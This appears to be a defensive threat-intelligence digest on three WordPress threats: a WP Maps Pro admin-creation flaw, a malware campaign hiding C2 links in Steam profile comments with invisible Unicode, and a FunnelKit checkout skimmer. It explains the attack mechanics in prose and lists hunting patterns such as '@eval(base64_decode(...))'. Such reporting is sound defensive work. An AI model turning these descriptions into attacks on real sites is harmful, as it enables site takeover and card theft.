WordPress malware abuses Steam profile comments as Unicode-steganography C2 (GoDaddy)

CVE-2026-8732 (CVSS 9.8) lets an unauthenticated attacker create a WordPress administrator account on sites running the WP Maps Pro plugin ≤ 6.1.0 by abusing a publicly disclosed nonce together with a wp_ajax_nopriv_ action handler that fails to enforce capability checks (The Hacker News, 2026-06-01 · BleepingComputer, 2026-05-31). The CVSS 9.8 rating is per The Hacker News. Exploitation is live — Wordfence reported blocking exploitation attempts at scale within 24 hours of disclosure. The fix is in version 6.1.1. Once an attacker holds an admin account, full site takeover (plugin/theme upload → webshell) follows.

GoDaddy Security detailed a WordPress malware campaign affecting roughly 2,000 sites that hides its command-and-control resolution inside benign-looking comments on Steam Community profile pages (GoDaddy Security, 2026-05-28 · BleepingComputer, 2026-06-01). The first-stage PHP backdoor on a compromised WordPress install fetches a specific Steam profile and decodes a URL hidden using six invisible Unicode characters (zero-width non-joiner/joiner U+200C/U+200D and the invisible-operator code points U+2061–U+2064), reconstructing a link to a malicious JavaScript file disguised as a legitimate library. A second-stage PHP backdoor then accepts base64-encoded PHP via cookie-authenticated HTTP POST, giving persistent arbitrary code execution. Initial access was traced to stolen FTP/SFTP credentials, vulnerable plugins/themes and supply-chain compromise.

Why it matters to us: Steam Community is allowlisted by most web proxies, so the C2 channel is effectively unblockable at the egress filter — defenders must detect at the host. Hunt for PHP files under wp-content/uploads containing @eval(base64_decode(...)), web-server processes issuing outbound requests to steamcommunity.com profile pages, and cookie-authenticated POSTs to .php endpoints. WordPress backs many Swiss municipal and cantonal sites; credential hygiene on FTP/SFTP and plugin patching are the front-line controls.

FunnelKit "Funnel Builder for WooCommerce" actively exploited as a Magecart skimmer on 40,000+ WordPress stores (daily 2026-05-17), no CVE assigned. The operational pattern (Magecart abuse of a popular WooCommerce plugin) is portable across the WordPress + WooCommerce e-commerce ecosystem used by Swiss / EU SMB retailers; SOC managers serving SMB or municipal e-commerce estates should sweep deployed WooCommerce plugin inventories for the affected FunnelKit version and audit checkout-page DOM for injected payment-form-skimming scripts.

Sansec published primary research on 2026-05-14 documenting active exploitation of an unauthenticated code-injection flaw in FunnelKit's Funnel Builder for WooCommerce plugin, with BleepingComputer corroborating on 2026-05-15 and The Hacker News expanding on 2026-05-16 (Sansec, 2026-05-14; BleepingComputer, 2026-05-15; The Hacker News, 2026-05-16). The vulnerable component is a publicly-exposed POST endpoint for checkout-funnel session management that fails to validate caller permissions — per The Hacker News's coverage of Sansec's research, "Funnel Builder includes a publicly exposed checkout endpoint that allows an incoming request to choose the type of internal method to run". An unauthenticated request can invoke the internal method responsible for writing the plugin's global settings and inject arbitrary content into the External Scripts field (Settings > Checkout > External Scripts), which then executes on every checkout page site-wide. Mapped to T1190 Exploit Public-Facing Application + T1505.003 Web-Shell-equivalent (Magecart variant). Sansec observed the live payload masquerading as a Google Tag Manager initialiser; the fake GTM loader pulls JavaScript from an attacker-controlled domain, opens a WebSocket to attacker C2, and retrieves a storefront-tailored skimmer that harvests credit-card numbers, CVVs, and billing data in real time during checkout. No CVE has been assigned. Affected: all FunnelKit Funnel Builder for WooCommerce versions before v3.15.0.3. Why it matters to us: the unauthenticated-write-to-plugin-settings pattern is increasingly common across WordPress commerce plugins and is reachable by any internet scanner — Swiss/EU cantonal e-service portals, healthcare patient-payment systems, and university e-commerce instances running WooCommerce are exposed without operator action. The WebSocket-to-attacker-C2 channel makes the skimmer payload polymorphic per victim, so static-IOC scanning of checkout HTML will miss it; defenders should audit wp_options for unrecognised funnel-builder external-script entries and alert on any WebSocket (wss://) connection initiated from a WordPress PHP process or visible in browser checkout traffic to non-CDN endpoints. Hardening: update to v3.15.0.3+ immediately; manually purge the External Scripts setting; deploy a server-side malware scanner against the plugin install path. Three independent corroborating sources clear the SINGLE-SOURCE rule.